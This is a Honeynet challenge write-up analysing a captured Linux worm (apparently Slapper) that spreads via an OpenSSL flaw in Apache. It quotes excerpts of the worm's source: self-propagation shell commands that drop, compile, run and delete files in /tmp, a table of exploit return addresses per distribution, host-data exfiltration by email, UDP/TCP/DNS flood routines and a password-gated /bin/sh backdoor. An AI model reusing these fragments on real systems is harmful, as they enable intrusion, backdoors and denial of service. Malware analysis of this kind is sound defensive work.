Asby and N|ghtHawk of Mostly Harmless
The Challenge:
Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock),
was used by the worm to infect the honeypot. Your mission is to analyze the captured file in
order to answer the questions below. Be sure you review the submission rules at the SotM
challenge page before submitting your results.
Questions
1. Which is the type of the .unlock file? When was it generated?
2. Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?
3. Which process name is used by the worm when it is running?
4. In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself,
which files remain on the infected machine?
5. Which port is scanned by the worm?
6. Which vulnerability the worm tries to exploit? In which architectures?
7. What kind of information is sent by the worm by email? To which account?
8. Which port (and protocol) is used by the worm to communicate to other infected machines?
9. Name 3 functionalities built in the worm to attack other networks.
10. What is the purpose of the .update.c program? Which port does it use?
Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?
Question 1: Which is the type of the .unlock file? When was it generated?
A. Which is the type of the .unlock file?
- gzip compressed data
hawkeye@gw:~/scan$ file .unlock
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
B. When was it generated?
- Fri Sep 20 12:59:04 2002
hawkeye@gw:~/scan$ file .unlock
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
Question 2: Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?
A. Based on the source code, who is the author of this worm?
- contem (contem@efnet)
- modified by aion (aion@ukr.net)
hawkeye@gw:~/scan$ head -4 .unlock.c |tail -2
* Peer-to-peer UDP Distributed Denial of Service (PUD) *
* by contem@efnet *
hawkeye@gw:~/scan$ head -38 .unlock.c |tail -1
* some modification done by aion (aion@ukr.net) *
B. When it was created?
- Sep 20 15:28
hawkeye@gw:~/scan$ ls -la |grep .unlock.c
-rw-r--r-- 1 hawkeye hawkeye 70981 Sep 20 15:28 .unlock.c
C. Is it compatible with the date from question 1?
- No, the .unlock.c is from a later date than the .unlock file
.unlock: Fri Sep 20 12:59:04 2002
.unlock.c: Sep 20 15:28
Question 3: Which process name is used by the worm when it is running?
- "httpd "
hawkeye@gw:~/scan$ head -78 .unlock.c |tail -1
#define PSNAME "httpd "
Question 4: In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?
A. In wich format the worm copies itself to the new infected machine?
- uuencoded
hawkeye@gw:~/scan$ head -1416 .unlock.c |tail -1
writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
hawkeye@gw:~/scan$ head -1421 .unlock.c|tail -1
writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
B. Which files are created in the whole process?
- /tmp/.unlock.uu
- /tmp/.unlock
- /tmp/.unlock.c
- /tmp/.update.c
- /tmp/httpd
- /tmp/update
hawkeye@gw:~/scan$ head -1424 .unlock.c |tail -4
writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
"tar xzf /tmp/.unlock -C /tmp/; "
"gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
"gcc -o /tmp/update /tmp/.update.c;\n");
C. After the worm executes itself, wich files remain on the infected machine?
- /tmp/.unlock
hawkeye@gw:~/scan$ head -1428 .unlock.c |tail -4
sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
sleep(3);ockfd,rcv);
writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
" /tmp/httpd /tmp/update; exit; \n");
Question 5: Which port is scanned by the worm?
- 80
hawkeye@gw:~/scan$ head -67 .unlock.c |tail -1
#define SCANPORT 80
Question 6: Which vulnerability the worm tries to exploit? In which architectures?
A. Which vulnerability the worm tries to exploit?
- openSSL
hawkeye@gw:~/scan$ head -1141 .unlock.c |tail -4
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
B. In which architectures?
- Gentoo
- Debian (1.3.26)
- Red-Hat (1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26)
- Suse (1.3.12,1.3.17,1.3.19,1.3.20,1.3.23)
- Mandrake (1.3.14,1.3.19,1.3.20,1.3.23)
- Slackware (1.3.26)
hawkeye@gw:~/scan$ head -1269 .unlock.c |tail -25
} architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
Question 7: What kind of information is sent by the worm by email? To which account?
A. What kind of information is sent by the worm by email?
- hostid
- hostname
- ip
hawkeye@gw:~/scan$ head -124 .unlock.c |tail -3
sprintf(cmdbuf," hostid: %d \r\n"
" hostname: %s \r\n"
" att_from: %s \r\n",gethostid(),buffer,sip);
B. To which account?
- aion@ukr.net
hawkeye@gw:~/scan$ head -77 .unlock.c |tail -1
#define MAILTO "aion@ukr.net"
Question 8: Which port (and protocol) is used by the worm to communicate to other infected machines?
- Port : 4156
- Protocol : UDP
hawkeye@gw:~/scan$ head -66 .unlock.c |tail -1
#define PORT 4156
hawkeye@gw:~/scan$ head -3 .unlock.c |tail -1
* Peer-to-peer UDP Distributed Denial of Service (PUD) *
Question 9: Name 3 functionalities built in the worm to attack other networks.
- UDP flood
- TCP flood (IPv4 and IPv6)
- DNS flood
hawkeye@gw:~/scan$ head -2205 .unlock.c |tail -1
case 0x29: { // Udp flood
hawkeye@gw:~/scan$ head -2246 .unlock.c |tail -1
case 0x2A: { // Tcp flood
hawkeye@gw:~/scan$ head -2279 .unlock.c |tail -1
case 0x2B: { // IPv6 Tcp flood
hawkeye@gw:~/scan$ head -2308 .unlock.c |tail -1
case 0x2C: { // Dns flood
Question 10: What is the purpose of the .update.c program? Which port does it use?
A. What is the purpose of the .update.c program?
- .update.c listens on a port and will execute the command which it gets. It seems to be a password protected
backdoor. After the command is executed, the script exits, so it may be a way to rebackdoor the machine
with another backdoor.
hawkeye@gw:~/scan$ head -66 .update.c|tail -4
if( !strncmp(temp_buff,PASS,strlen(PASS)) )
execl("/bin/sh","sh -i",(char *)0);
closeall();
exit(0);
B. Which port does it use?
- 1052
hawkeye@gw:~/scan$ head -4 .update.c|tail -1
#define PORT 1052
Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?
- The SLEEPTIME lets the script sleep for 5 minutes (300 seconds), en the UPTIME lets the script listen to the port
for 10 seconds. This way the port wont seem to respons when people connect to it or try to use/scan it.
hawkeye@gw:~/scan$ head -7 .update.c|tail -2
#define SLEEPTIME 300 // sleep 5 min.
#define UPTIME 10 // listen 10 sec.
hawkeye@gw:~/scan$ head -52 .update.c|tail -1
for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
hawkeye@gw:~/scan$ head -73 .update.c|tail -1
sleep(SLEEPTIME);
Conclusion
The .unlock file seems to be the Linux.Worm.Slapper.C.
Asby and N|ghtHawk
Mostly Harmless